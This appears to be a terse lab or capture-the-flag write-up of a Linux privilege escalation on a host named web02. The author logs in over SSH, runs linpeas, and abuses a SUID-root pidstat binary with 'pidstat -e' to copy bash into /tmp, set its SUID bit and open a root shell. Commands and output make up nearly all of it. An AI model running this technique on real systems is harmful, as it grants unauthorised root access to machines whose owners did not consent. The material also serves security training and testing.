```rust
 ssh -i rsa_id_j jennifer@192.168.1.19
Enter passphrase for key 'rsa_id_j':
Enter passphrase for key 'rsa_id_j':
Enter passphrase for key 'rsa_id_j':
Linux web02 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Mar  8 06:00:13 2023 from 192.168.1.11
jennifer@web02:~$
```

running linpeas

```rust

                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-sr-x 1 root root 71K Feb  2  2021 /usr/bin/pidstat
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 35K Feb 26  2021 /usr/bin/fusermount
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 55K Jan 20  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 71K Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Jan 20  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 471K Dec 21  2023 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51K Jun  6  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
```

```
-rwsr-sr-x 1 root root 71K Feb  2  2021 /usr/bin/pidstat
```

pidstat was yellow

```rust
jennifer@web02:~/p3ta$ COMMAND=id
jennifer@web02:~/p3ta$ sudo pidstat -e $COMMAND
-bash: sudo: command not found
jennifer@web02:~/p3ta$ pidstat -e $COMMAND
Linux 5.10.0-28-amd64 (web02)   11/10/24        _x86_64_        (2 CPU)

04:24:10      UID       PID    %usr %system  %guest   %wait    %CPU   CPU  Command
04:24:10     1001     60524    0.00    0.00    0.00    0.00    0.00     1  id
jennifer@web02:~/p3ta$ uid=1001(jennifer) gid=1001(jennifer) euid=0(root) egid=0(root) groups=0(root),1001(jennifer)
```

```rust
jennifer@web02:~/p3ta$ pidstat -e cp /bin/bash /tmp
Linux 5.10.0-28-amd64 (web02)   11/10/24        _x86_64_        (2 CPU)

04:33:01      UID       PID    %usr %system  %guest   %wait    %CPU   CPU  Command
04:33:01     1001     60677    0.00    0.00    0.00    0.00    0.00     1  cp

jennifer@web02:~/p3ta$  pidstat -e chmod +s /tmp/bash
Linux 5.10.0-28-amd64 (web02)   11/10/24        _x86_64_        (2 CPU)

04:34:52      UID       PID    %usr %system  %guest   %wait    %CPU   CPU  Command
04:34:52     1001     60731    0.00    0.00    0.00    0.00    0.00     1  pidstat
jennifer@web02:~/p3ta$ /tmp/bash -p
bash-5.1#
```